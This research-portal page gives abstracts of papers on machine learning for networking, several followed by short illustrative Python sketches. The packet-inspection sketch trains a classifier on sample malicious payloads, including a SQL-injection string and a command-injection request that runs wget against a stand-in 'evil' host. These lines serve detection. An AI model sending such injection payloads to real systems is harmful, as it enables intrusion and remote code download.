
Machine Learning for Networking: Workflow, Advances and Opportunities

Posted by Mowei Wang
Publication date: 2017
Research field: Informatics Engineering
Paper language: English





Recently, machine learning has been applied in nearly every field to leverage its remarkable power. For a long time, networking and distributed computing systems have been the key infrastructure providing efficient computational resources for machine learning. Networking itself can also benefit from this promising technology. This article focuses on the application of Machine Learning techniques for Networking (MLN), which can not only help solve long-standing, intractable networking problems but also stimulate new network applications. In this article, we summarize the basic workflow for applying machine learning technology in the networking domain. We then provide a selective survey of the latest representative advances, with explanations of their design principles and benefits. These advances are grouped by network design objective, and detailed information on how they carry out each step of the MLN workflow is presented. Finally, we shed light on new opportunities in networking design and in community building for this emerging interdiscipline. Our goal is to provide a broad research guideline for networking with machine learning, to help and motivate researchers to develop innovative algorithms, standards, and frameworks.
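To make the workflow idea concrete, the following is a minimal, hypothetical sketch of a generic MLN pipeline of the kind the abstract refers to: collect flow measurements, extract features, train a model offline, and then make online predictions. The feature names, the synthetic data, and the choice of a random-forest classifier are illustrative assumptions, not the paper's method.

```python
# Hypothetical MLN workflow sketch: measure -> featurize -> train -> predict.
# Synthetic data and the "elephant flow" label are assumptions for illustration.
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)

# Steps 1-2: per-flow features, e.g. [mean packet size (B), duration (s), packet rate (pkt/s)]
X = rng.normal(loc=[800.0, 2.0, 50.0], scale=[200.0, 1.0, 20.0], size=(1000, 3))
y = (X[:, 0] * X[:, 2] > 45000).astype(int)   # hypothetical "elephant flow" label

# Step 3: offline model training
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.2, random_state=0)
model = RandomForestClassifier(n_estimators=50, random_state=0).fit(X_tr, y_tr)

# Step 4: online inference on newly observed flows
print("held-out accuracy:", model.score(X_te, y_te))
```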


Read also

While machine learning and artificial intelligence have long been applied in networking research, the bulk of such work has focused on supervised learning. Recently there has been a rising trend of employing unsupervised machine learning on unstructured raw network data to improve network performance and provide services such as traffic engineering, anomaly detection, Internet traffic classification, and quality-of-service optimization. The interest in applying unsupervised learning techniques in networking emerges from their great success in other fields such as computer vision, natural language processing, speech recognition, and optimal control (e.g., for developing autonomous self-driving cars). Unsupervised learning is attractive because it removes the need for labeled data and manual handcrafted feature engineering, thereby facilitating flexible, general, and automated machine learning methods. The focus of this survey paper is to provide an overview of the applications of unsupervised learning in the domain of networking. We provide a comprehensive survey highlighting recent advancements in unsupervised learning techniques and describe their applications for various learning tasks in the context of networking. We also discuss future directions and open research issues, while identifying potential pitfalls. While a few survey papers focusing on the applications of machine learning in networking have previously been published, a survey of similar scope and breadth is missing from the literature. Through this paper, we advance the state of knowledge by carefully synthesizing the insights from those survey papers while also providing contemporary coverage of recent advances.
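As a concrete illustration of the kind of unsupervised technique such a survey covers, the following is a minimal sketch of clustering-based anomaly detection on flow statistics. The two-feature representation, the synthetic traffic mix, and the minority-cluster heuristic are assumptions made for illustration only, not a method from the paper.

```python
# Hypothetical sketch: unsupervised anomaly detection by clustering flow features.
# Features, traffic mix, and the minority-cluster heuristic are illustrative assumptions.
import numpy as np
from sklearn.cluster import KMeans

rng = np.random.default_rng(1)
normal = rng.normal(loc=[500.0, 30.0], scale=[100.0, 10.0], size=(950, 2))   # [bytes/pkt, pkt/s]
attack = rng.normal(loc=[60.0, 400.0], scale=[10.0, 50.0], size=(50, 2))     # flood-like traffic
X = np.vstack([normal, attack])

kmeans = KMeans(n_clusters=2, n_init=10, random_state=0).fit(X)

# When attacks are rare, the smaller cluster is a reasonable candidate for "anomalous"
counts = np.bincount(kmeans.labels_)
anomalous = int(np.argmin(counts))
print("flows flagged as anomalous:", int((kmeans.labels_ == anomalous).sum()))
```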
Deep packet inspection (DPI) has been extensively investigated in software-defined networking (SDN), as sophisticated attacks may inject malicious payloads into packets in ways that are hard to track. Existing proprietary pattern-based or port-based third-party DPI tools can suffer from limitations in efficiently processing a large volume of data traffic. In this paper, a novel OpenFlow-enabled deep packet inspection (OFDPI) approach is proposed based on the SDN paradigm to provide adaptive and efficient packet inspection. First, OFDPI prescribes early detection at the flow-level granularity by checking the IP addresses of each new flow via OpenFlow protocols. Then, OFDPI allows for deep packet inspection at the packet-level granularity: (i) for unencrypted packets, OFDPI extracts features of the accessible payloads, including tri-gram frequency based on Term Frequency-Inverse Document Frequency (TF-IDF) and linguistic features. These features are concatenated into a sparse matrix representation and then used to train a binary classifier with logistic regression, rather than matching against specific pattern combinations. To balance detection accuracy against the performance bottleneck of the SDN controller, OFDPI introduces an adaptive packet sampling window based on linear prediction; and (ii) for encrypted packets, OFDPI extracts notable packet features and trains a binary classifier with a decision tree, instead of decrypting the encrypted traffic and weakening user privacy. A prototype of OFDPI is implemented on the Ryu SDN controller and the Mininet platform. The performance and overhead of the proposed solution are assessed through experiments on real-world datasets. The numerical results indicate that OFDPI can provide a significant improvement in detection accuracy with acceptable overhead.
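The unencrypted-packet path described above (tri-gram TF-IDF features plus a logistic-regression classifier) can be sketched in a few lines. This is not the authors' implementation; the toy payloads, labels, and scikit-learn pipeline below are assumptions made only to illustrate the feature-and-classifier combination the abstract names.

```python
# Hypothetical sketch of tri-gram TF-IDF features + logistic regression for payload classification.
# Toy payloads and labels are assumptions; they are not from the OFDPI paper or its datasets.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

payloads = [
    "GET /index.html HTTP/1.1 Host: example.com",       # benign
    "POST /login user=alice&pass=secret",                # benign
    "GET /search?q=' OR '1'='1' -- HTTP/1.1",            # malicious (SQL-injection-like)
    "GET /cgi-bin/;wget%20http://evil/x.sh HTTP/1.1",    # malicious (command-injection-like)
]
labels = [0, 0, 1, 1]  # 1 = malicious payload

# Character tri-grams weighted by TF-IDF give the sparse matrix; LR makes the binary decision.
clf = make_pipeline(
    TfidfVectorizer(analyzer="char", ngram_range=(3, 3)),
    LogisticRegression(max_iter=1000),
)
clf.fit(payloads, labels)
print(clf.predict(["GET /items?id=' OR '1'='1' HTTP/1.1"]))  # likely [1] given the tri-gram overlap
```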
Unmanned aerial vehicles (UAVs), or drones, are envisioned to support extensive applications in next-generation wireless networks in both civil and military fields. Empowering UAV networks with intelligence through artificial intelligence (AI), and especially machine learning (ML) techniques, is both inevitable and appealing for enabling the aforementioned applications. To address the problems of traditional cloud-centric ML for UAV networks, such as privacy concerns, unacceptable latency, and resource burden, a distributed ML technique, i.e., federated learning (FL), has recently been proposed to enable multiple UAVs to collaboratively train an ML model without exposing raw data. However, almost all existing FL paradigms are still centralized, i.e., a central entity is in charge of ML model aggregation and fusion over the whole network, which could result in a single point of failure and is ill-suited to UAV networks with both unreliable nodes and links. Thus motivated, in this article we propose a novel architecture called DFL-UN (Decentralized Federated Learning for UAV Networks), which enables FL within UAV networks without a central entity. We also conduct a preliminary simulation study to validate the feasibility and effectiveness of the DFL-UN architecture. Finally, we discuss the main challenges and potential research directions for DFL-UN.
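The core idea, each UAV training locally and then averaging parameters only with its one-hop neighbours instead of with a central server, can be sketched as follows. The ring topology, the local linear-regression task, the step size, and the neighbour-averaging rule are illustrative assumptions, not the DFL-UN algorithm itself.

```python
# Hypothetical sketch of decentralized federated averaging over a small UAV ring topology.
# Topology, data, learning rate, and averaging rule are illustrative assumptions only.
import numpy as np

rng = np.random.default_rng(2)
n_uavs, dim = 4, 3
neighbours = {i: [(i - 1) % n_uavs, (i + 1) % n_uavs] for i in range(n_uavs)}  # assumed ring

# Each UAV holds its own samples drawn from the same underlying linear model
true_w = np.array([1.0, -2.0, 0.5])
data = []
for _ in range(n_uavs):
    X = rng.normal(size=(50, dim))
    data.append((X, X @ true_w + rng.normal(scale=0.1, size=50)))

w = [np.zeros(dim) for _ in range(n_uavs)]
for _ in range(100):
    # 1) local gradient step on each UAV's own data (no raw data leaves the UAV)
    for i, (X, y) in enumerate(data):
        grad = X.T @ (X @ w[i] - y) / len(y)
        w[i] = w[i] - 0.05 * grad
    # 2) decentralized aggregation: average only with one-hop neighbours, no central server
    w = [np.mean([w[i]] + [w[j] for j in neighbours[i]], axis=0) for i in range(n_uavs)]

print("UAV 0 model:", np.round(w[0], 2), "true weights:", true_w)
```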
Machine learning (ML) is a subfield of artificial intelligence. The term applies broadly to a collection of computational algorithms and techniques that train systems from raw data rather than a priori models. ML techniques are now technologically mature enough to be applied to particle accelerators, and we expect that ML will become an increasingly valuable tool to meet new demands for beam energy, brightness, and stability. The intent of this white paper is to provide a high-level introduction to problems in accelerator science and operation where incorporating ML-based approaches may provide significant benefit. We review ML techniques currently being investigated at particle accelerator facilities, and we place specific emphasis on active research efforts and promising exploratory results. We also identify new applications and discuss their feasibility, along with the required data and infrastructure strategies. We conclude with a set of guidelines and recommendations for laboratory managers and administrators, emphasizing the logistical and technological requirements for successfully adopting this technology. This white paper also serves as a summary of the discussion from a recent workshop held at SLAC on ML for particle accelerators.
The problem of quality-of-service (QoS)- and jamming-aware communications is considered in an adversarial wireless network subject to external eavesdropping and jamming attacks. To ensure robust communication against jamming, an interference-aware routing protocol is developed that allows nodes to avoid communication holes created by jamming attacks. Then, a distributed cooperation framework based on deep reinforcement learning is proposed that allows nodes to assess network conditions and make deep-learning-driven, distributed, real-time decisions on whether to participate in data communications, defend the network against jamming and eavesdropping attacks, or jam other transmissions. The objective is to maximize a network performance measure that incorporates throughput, energy efficiency, delay, and security metrics. Simulation results show that the proposed jamming-aware routing approach is robust against jamming and that, when throughput is prioritized, the proposed deep reinforcement learning approach can achieve a significant (three-fold) increase in throughput compared to a benchmark policy with fixed roles assigned to nodes.
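As a simplified illustration of the role-selection idea, the following sketch uses tabular Q-learning (a stand-in for the deep reinforcement learning used in the paper) to let a node learn whether to transmit or defend based on an observed channel state. The state space, reward model, and jammer behaviour are assumptions made only for illustration.

```python
# Hypothetical tabular Q-learning stand-in for deep-RL role selection under jamming.
# States, actions, rewards, and jammer behaviour are illustrative assumptions only.
import numpy as np

rng = np.random.default_rng(3)
n_states = 2                      # 0 = channel clear, 1 = channel jammed
actions = ["transmit", "defend"]  # simplified subset of the roles discussed in the paper
Q = np.zeros((n_states, len(actions)))
alpha, gamma, eps = 0.1, 0.9, 0.1

def step(state, action):
    # Assumed reward model: transmitting pays off only on a clear channel,
    # defending pays off when the channel is jammed.
    if action == 0:
        reward = 1.0 if state == 0 else -1.0
    else:
        reward = 0.5 if state == 1 else -0.2
    return reward, int(rng.integers(n_states))   # jammer modelled as a random process

state = 0
for _ in range(5000):
    a = int(rng.integers(len(actions))) if rng.random() < eps else int(np.argmax(Q[state]))
    r, nxt = step(state, a)
    Q[state, a] += alpha * (r + gamma * Q[nxt].max() - Q[state, a])
    state = nxt

print("learned policy:", {s: actions[int(np.argmax(Q[s]))] for s in range(n_states)})
```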